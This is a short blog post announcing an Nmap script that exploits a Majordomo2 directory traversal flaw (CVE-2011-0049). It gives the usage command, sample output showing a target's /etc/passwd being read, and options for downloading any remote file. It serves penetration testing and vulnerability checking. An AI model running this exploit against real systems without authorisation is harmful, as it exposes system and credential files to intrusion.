Exploiting Majordomo2 with Nmap

This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it  Smile

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT STATE SERVICE

  80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
| 
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile – Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri – URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile – If set it saves the remote file to this location.

 

Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse

calderpwn

Infosec consultant | Software dev | Open Source contributor | Speaker

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>